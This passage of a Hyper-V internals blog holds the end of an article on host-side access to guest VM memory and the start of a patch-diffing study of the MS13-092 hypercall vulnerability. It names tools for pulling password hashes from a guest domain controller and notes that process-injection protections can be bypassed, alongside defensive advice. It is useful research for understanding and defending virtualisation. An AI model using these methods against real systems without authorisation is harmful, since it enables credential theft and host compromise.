<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!VmCreateMemoryProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Vid!VsmmNtSlatMemoryProcessCreate</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 Vid!VsmmCloneTemplateApply</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 vmwp!VidPartitionManager::Initialize</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 vmwp!VidPartitionManager::CreateInstance</span></div>
</td></tr>
</tbody></table>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We again see a pseudo-Gpar object pointing to a user-mode structure (as seen above, this block is created for interaction with virtual devices):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 50px; overflow: hidden; width: 586px;"><img height="50" src="https://lh6.googleusercontent.com/1m8ZP0DkJHWkJiqIcbp8xrhu2ibzsM-J7iuh3oTqrXbgEWYkagMQM85EK3-SstRXtixBWHe5AL87BPJIDIxK62E5tQbw-ED7OIh5x5Js7LZTDJ2rT9NybUNiI1oc1ydBV28dR8s" style="margin-left: 0px; margin-top: 0px;" width="586" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To read memory inside this block we have to switch to the vmwp.exe context:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 358px; overflow: hidden; width: 365px;"><img height="358" src="https://lh5.googleusercontent.com/5mdgtVmQ0UfYkv-0FAS3YOXordPtQB8Nr6p99GyRxHIgwIBVPn5vlM9tjeCc0voeEgZgGCcdAUEAr2uLcPPX6ScrzkO-Hu1ZMgnFc7y-PB4LRNmjzOaC32LyuLHH-eKbbD3Tlz0" style="margin-left: 0px; margin-top: 0px;" width="365" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 111px; overflow: hidden; width: 428px;"><img height="111" src="https://lh5.googleusercontent.com/Xq17kEQRf4Sx9g7l1JHx9kaYreXkXgDJyQyTMxv9LEDyEXkcOUBvxbVNPGgwB4Za8AH2t4S14_QgakiMi1RiHapLiy_So7id8gNTsJ8nVGvpAD_SVOgGexaQqfuBF-2zz-wu7eg" style="margin-left: 0px; margin-top: 0px;" width="428" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 140px; overflow: hidden; width: 540px;"><img height="140" src="https://lh4.googleusercontent.com/PboR8SMElzwsQj-NbUHh5jiddV7RNB_rIiKKVzPx2zLlNGFGQ-wmc5kIRqLtb9FM9RLBNwO9xUbFER3tAMAiOVKRs89u0BwzjtyGDor-clkM3U2G0tYiLDNoxxYSNKlrCX3yv8Y" style="margin-left: 0px; margin-top: 0px;" width="540" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The vmwp.exe process of the Docker container holds handles to the files used inside the container:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 226px; overflow: hidden; width: 558px;"><img height="226" src="https://lh5.googleusercontent.com/Y2-jnx-OgSkEqraXo063Z66cEAHHtJ_4NHPQHiqQaBj9V6sbST5CXp1-ov0dXQihjuB3BBwcc0ImLf_Cb0an6kfudCr4rRCD85gHn8z1_7dHE5DBboavLCc0cdxeA_EC7ihchJM" style="margin-left: 0px; margin-top: 0px;" width="558" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">More information about Docker container internals can be found in this video from the Microsoft Ignite conference:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<a href="https://www.youtube.com/watch?time_continue=2291&v=tG8R5SQGPck" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://www.youtube.com/watch?time_continue=2291&v=tG8R5SQGPck</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (OS internals: Technical deep-dive into operating system innovations - BRK3365, starting from 38:11).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Usage examples</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In which programs can we use the ability to read/write memory to the guest OS?</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">LiveCloudKd (an alternative to Sysinternals LiveKd with the -hvl option).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the screenshot, one full VM running Windows Server 2019 and one Docker container in Hyper-V isolation mode are running on the Hyper-V host server.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<a href="https://github.com/gerhart01/LiveCloudKd/releases" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/releases</span></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 273px; overflow: hidden; width: 481px;"><img height="273" src="https://lh3.googleusercontent.com/-5EzZFN-rWOJj84D6R3lV6Nl3bm3MwCmwDjxlV_NOcGbgA3a7PEoWARMOA6u6cJ8TUSd3rOdabWsGzsliRDGwza9-Mv3pF2oyo53fVNER3B2-JNz1eeAqTFbvUwD6QXQbuvlX98" style="margin-left: 0px; margin-top: 0px;" width="481" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">An EXDi plugin for WinDBG: the options are the same, but it lets you use the documented WinDBG integration interfaces (LiveCloudKd instead hooks some functions inside WinDBG). It even works with WinDBG Preview, which itself runs in a separate container (UWP application). At the time of writing, the EXDi plugin only works on Windows Server 2019\Windows 10 with the hvmm.sys driver loaded, since it requires write access to the guest OS. The screenshot shows WinDBG Preview running in EXDi mode together with the mimilib.dll plugin, which is part of the mimikatz utility.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<a href="https://github.com/gerhart01/LiveCloudKd/tree/master/ExdiKdSample" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/tree/master/ExdiKdSample</span></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 498px; overflow: hidden; width: 525px;"><img height="498" src="https://lh4.googleusercontent.com/26hsc4RHatB_BTdxkPIz2iMMjWWSwORtph52W7ZjUMfts3swE6bcHGXDAH5N-IjtZCIDZ9g9_rSJDGsmhxn4KAQ08CieaLsQNblaN9yXA8pblgbmaw1WDdF_iM0PYVZ7KHYYwK0" style="margin-left: 0px; margin-top: 0px;" width="525" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The plugin for the MemProcFS program (</span><a href="https://github.com/ufrisk/MemProcFS" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/ufrisk/MemProcFS</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), which is integrated with pypykatz (</span><a href="https://github.com/skelsec/pypykatz" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/skelsec/pypykatz</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), also allows you to scan the guest OS for hashes (in the screenshot, the guest OS is a domain controller based on Windows Server 2016).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<a href="https://github.com/gerhart01/LiveCloudKd/tree/master/LeechCore" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/tree/master/LeechCore</span></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 282px; overflow: hidden; width: 528px;"><img height="282" src="https://lh4.googleusercontent.com/wEctKwlRoHWjiDWstyuhedT1Sm3Nz-OHeAeDjnxXTg3GLVkBG3x8MvW31er7XtL4rFhi-WOLxRXVA7qlOXjv2UfFDXiVkaltLYWl1GToYzJY8-5W6xrZnmZzSGVLsd4qpopnWVI" style="margin-left: 0px; margin-top: 0px;" width="528" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Clearly, to use this method you need administrator access to the host server. So, first of all, I position the utility as a way to dig inside the guest OS when configuring the debugger takes too long, is too much effort, or is impossible (for example, when the Secure Boot option is active).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Conclusion</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The article described various ways of accessing the memory of Hyper-V guest partitions created in a variety of configurations. I hope that working with Hyper-V memory has become a little more understandable. Hyper-V evolves very quickly and integrates more and more actively into the Windows kernel, while remaining virtually undocumented.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The information may be useful to those who want to understand the internal structure of Hyper-V and possibly get transparent access to guest OS memory, as well as modify it. Using LiveCloudKd requires access to the root OS where the virtual machines are located, and I don’t think that it carries any security risk. However, on Windows Server 2016 such access can be obtained using only the user mode API, which is rather problematic to control. For protection, it is recommended either to enable the Shielded VM option (then, to bypass it, you would need to load a driver), or to use Windows Server 2019, where Microsoft blocked the API call from vid.dll for third-party processes and enabled for vmwp.exe the prohibition on injecting libraries that are not signed by Microsoft. However, recent work on injecting code into third-party processes, presented in August 2019 at Black Hat in Las Vegas (the talk “Process Injection Techniques - Gotta Catch Them All” by Itzik Kotler and Amit Klein of SafeBreach Labs), shows that there are ways to get around these restrictions from user mode (of course, this requires local administrator rights). The only reliable protection against such access to guest OS memory is Microsoft's Code Integrity in conjunction with Shielded VM.</span></div>
<br />
<br />
<br /></div>
</div>
Gerhart X, published 2017-10-27: Hyper-V debugging for beginners. Part 2, or half disclosure of MS13-092<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" id="docs-internal-guid-8c16ddb9-5f74-3bd3-7840-8b5b26f2ace5" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The original article was written at the end of 2013 in Russian (</span><a href="http://www.securitylab.ru/contest/448457.php" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://www.securitylab.ru/contest/448457.php</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), but since I didn’t see examples of 1-day Hyper-V bug research, I decided to translate it into English (with some fixes). The article was written before ERNW published its information disclosure for MS13-092 (</span><a href="https://www.ernw.de/wp-content/uploads/ERNW_Newsletter_43_HyperV_en.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://www.ernw.de/wp-content/uploads/ERNW_Newsletter_43_HyperV_en.pdf</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this publication I try to describe how to use the information from the article “Hyper-V debugging for beginners” (</span><a href="http://hvinternals.blogspot.com/2015/10/hyper-v-debugging-for-beginners.html" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://hvinternals.blogspot.com/2015/10/hyper-v-debugging-for-beginners.html</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) to research a 1-day Hyper-V vulnerability using patch-diffing techniques. Windows 8 x64 was used as the guest OS.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On 12 November 2013 Microsoft published bulletin MS13-092 (KB2893986), describing a vulnerability in Windows Server 2012 Hyper-V which allowed a guest OS to generate a BSOD in the root OS or to execute arbitrary code in other guest OSes on the same physical host.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Download the patch and see which files were changed. They are hvix64.exe and hvax64.exe (version 6.2.9200.20840), the debugging DLL kdhvcom.dll, and hvservice.sys (probably it contains code for hypervisor hibernation, but I could be wrong). We look at hvix64.exe (I have an Intel CPU).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we have to find the patch issued before KB2893986 – it is KB2885465. According to </span><a href="http://support.microsoft.com/kb/2885465" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://support.microsoft.com/kb/2885465</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> the hvix64.exe version is 6.2.9200.20811 from 30.08.2013, but the archive contains version 6.2.9200.20814 from 04.09.2013.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, we take the BinDiff plugin for IDA Pro and try to compare these two versions of hvix64.exe. The main problem with debugging hvix64.exe is that there are no public symbols. We have many unknown functions in IDA Pro, named with the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">sub_</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> prefix. Moreover, IDA Pro doesn’t recognize many functions at all, and we need to recover them manually (using scripts where possible). Following the first part of the article (http://hvinternals.blogspot.com/2015/10/hyper-v-debugging-for-beginners.html) we load hvix64.exe, import known functions from hvloader.exe, kdhvcom.dll and winload.exe using BinDiff (yes, parts of them are identical), create the hypercall table using mVmcallHandlersTable.py (https://github.com/gerhart01/Hyper-V-scripts/blob/master/CreatemVmcallHandlersTable2016.py), configure the debugger, attach to the host server, recover the interrupt handlers using a script, and find the VM_EXIT handler. 
Also, we must find all locations whose names begin with </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">loc_</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and manually make functions from them (P key in IDA Pro). In hvix64.exe many functions end with a call that generates an exception (without returning), and IDA Pro cannot recognize them automatically.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can read in the vulnerability description (</span><a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-092" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://technet.microsoft.com/en-us/security/bulletin/ms13-092</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">): «…The vulnerability could allow elevation of privilege if an attacker passes a specially crafted function parameter in a hypercall from an existing running virtual machine to the hypervisor. The vulnerability could also allow denial of service for the Hyper-V host if the attacker passes a specially crafted </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">function parameter in a hypercall</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> from an existing running virtual machine to the hypervisor». Based on this information we must concentrate on the hypercall handlers. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, at </span><a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3898" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3898</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> we can read more detailed information:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">“Microsoft Windows 8 and Windows Server 2012, when Hyper-V is used, does not ensure </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">memory-address validity</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, which allows guest OS users to execute arbitrary code in all guest OS instances, and allows guest OS users to cause a denial of service (host OS crash), via a guest-to-host hypercall with a crafted function parameter, aka "Address Corruption Vulnerability."”</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">With this additional information, we will try to find all changes in the hypercall handlers that contain code working with memory.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are no symbols for hvix64.exe, so I give the prefix </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">m </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">to manually defined functions (to distinguish them from the library functions imported earlier with BinDiff).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Ok, let’s follow the execution: from mHOST_RIP (the VM Exit handler) we go to mParseVMExit,</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
